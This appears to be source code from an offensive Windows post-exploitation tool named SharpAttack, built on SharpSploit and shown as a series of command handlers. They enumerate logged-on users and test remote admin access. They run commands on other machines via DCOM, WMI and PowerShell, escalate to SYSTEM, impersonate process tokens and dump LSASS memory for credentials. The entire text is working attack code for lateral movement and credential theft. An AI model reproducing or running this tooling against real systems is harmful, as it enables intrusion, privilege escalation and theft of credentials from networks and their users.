public override void Run(Dictionary <String, Parameter> RunParams) { if (RunParams.TryGetValue("Command", out Parameter command)) { Command cmd = null; try { cmd = SharpAttack.AvailableCommands[command.Value[0]]; Printing.TableHeader(command.Value[0], cmd.Helptext, "Parameter", "Description"); foreach (KeyValuePair <string, Parameter> parm in cmd.Parameters) { Printing.TableItem($"-{parm.Key}", parm.Value.HelpText); } } catch { Printing.Error($"No command found named: {command.Value[0]}"); } } else { Printing.TableHeader("SharpAttack Commands", "Here are the commands available to you", "Command", "Description"); foreach (KeyValuePair <string, Command> cmd in SharpAttack.AvailableCommands) { Printing.TableItem(cmd.Key, cmd.Value.Helptext); } } }
public override void Run(Dictionary <String, Parameter> RunParams) { List <string> targets = Proccessing.GetTargets(RunParams); if (targets.Count > 0) { foreach (string target in targets) { string computer = target; try { if (computer == null) { computer = "localhost"; } List <string> printedUsers = new List <string>(); List <Net.LoggedOnUser> users = Net.GetNetLoggedOnUsers(computer); Printing.CmdOutputHeading($"Logged on users for {computer}"); foreach (Net.LoggedOnUser user in users) { if (!user.UserName.EndsWith("$") && !printedUsers.Contains(user.UserName)) { Printing.CmdOutputItem($"User {user.UserName} is logged in from {user.ComputerName}"); printedUsers.Add(user.UserName); } } } catch { Printing.Error($"Could not get logged on users for {computer}"); } } } }
public override void Run(Dictionary <String, Parameter> RunParams) { List <string> targets = Proccessing.GetTargets(RunParams); if (targets.Count > 0) { SharpSploitResultList <Network.PortScanResult> scan = Network.PortScan(targets, 445, true); foreach (Network.PortScanResult scanResult in scan) { if (scanResult.IsOpen) { ServiceController serviceController = new ServiceController("Spooler", scanResult.ComputerName); try { serviceController.ServiceHandle.Close(); Printing.Success($"Admin access to {scanResult.ComputerName}"); } catch { Printing.Error($"No access to {scanResult.ComputerName}"); } } else { Printing.Error($"Port {scanResult.Port} is not open on {scanResult.ComputerName}"); } } } else { Printing.Error("Need to specify a ComputerName or IPAddress"); } }
public override void Run(Dictionary <String, Parameter> RunParams) { string Parameters = null; DCOM.DCOMMethod Method = DCOM.DCOMMethod.MMC20_Application; if (RunParams.TryGetValue("Parameters", out Parameter parameters)) { Parameters = parameters.Value[0]; } if (RunParams.TryGetValue("Method", out Parameter method)) { string value = method.Value[0]; switch (value) { case "MMC20": Method = DCOM.DCOMMethod.MMC20_Application; break; case "ShellWindow": Method = DCOM.DCOMMethod.ShellWindows; break; case "ShellBrowserWindow": Method = DCOM.DCOMMethod.ShellBrowserWindow; break; case "ExcelDDE": Method = DCOM.DCOMMethod.ExcelDDE; break; default: Printing.Error($"{value} is not a valid method"); break; } } if (RunParams.TryGetValue("ComputerName", out Parameter computer)) { if (RunParams.TryGetValue("Command", out Parameter command)) { foreach (string cmd in command.Value) { DCOM.DCOMExecute(computer.Value, cmd, Parameters, null, Method); } } else { Printing.Error("No command specified"); } } else { Printing.Error("No Computer Name specified."); } }
public override void Run(Dictionary <String, Parameter> RunParams) { if (tokens.RevertToSelf()) { Printing.Success("Successfully reverted to self"); } else { Printing.Error("Failed to revert to self. We're stuck forever."); } }
public override void Run(Dictionary <String, Parameter> RunParams) { if (tokens.GetSystem()) { Printing.Success("Successfully became SYSTEM"); } else { Printing.Error("Failed to get SYSTEM"); } }
public override void Run(Dictionary <String, Parameter> RunParams) { if (RunParams.TryGetValue("Command", out Parameter command)) { foreach (string cmd in command.Value) { Printing.CmdOutput(Shell.PowerShellExecute(cmd)); } } else { Printing.Error("No command specified"); } }
public override void Run(Dictionary <String, Parameter> RunParams) { int id = -1; string OutputPath = Host.GetCurrentDirectory(); string OutputName = "output.bin"; if (RunParams.TryGetValue("PID", out Parameter pid)) { id = int.Parse(pid.Value[0]); } if (RunParams.TryGetValue("OutputPath", out Parameter outpath)) { OutputPath = outpath.Value[0]; } if (RunParams.TryGetValue("OutputName", out Parameter outname)) { OutputName = outname.Value[0]; } if (id < 0) { try { Host.CreateProcessDump("lsass", OutputPath, OutputName); Printing.Success($"Dump created at {OutputPath}\\{OutputName}"); } catch { Printing.Error($"Error creating process dump."); } } else { try { Host.CreateProcessDump(id, OutputPath, OutputName); Printing.Success($"Dump created at {OutputPath}\\{OutputName}"); } catch { Printing.Error($"Error creating process dump."); } } }
public override void Run(Dictionary <String, Parameter> RunParams) { if (RunParams.TryGetValue("ComputerName", out Parameter computer)) { if (RunParams.TryGetValue("Command", out Parameter command)) { foreach (string cmd in command.Value) { WMI.WMIExecute(computer.Value, cmd, null, null); } } else { Printing.Error("No command specified"); } } }
public override void Run(Dictionary <String, Parameter> RunParams) { if (RunParams.TryGetValue("PID", out Parameter pid)) { UInt32 id = Convert.ToUInt32(pid.Value[0]); Tokens tokens = new Tokens(); if (tokens.ImpersonateProcess(id)) { Printing.Success("Successfully impersonated process."); } else { Printing.Error("Failed to impersonate process"); } } else { Printing.Error("No PID specified"); } }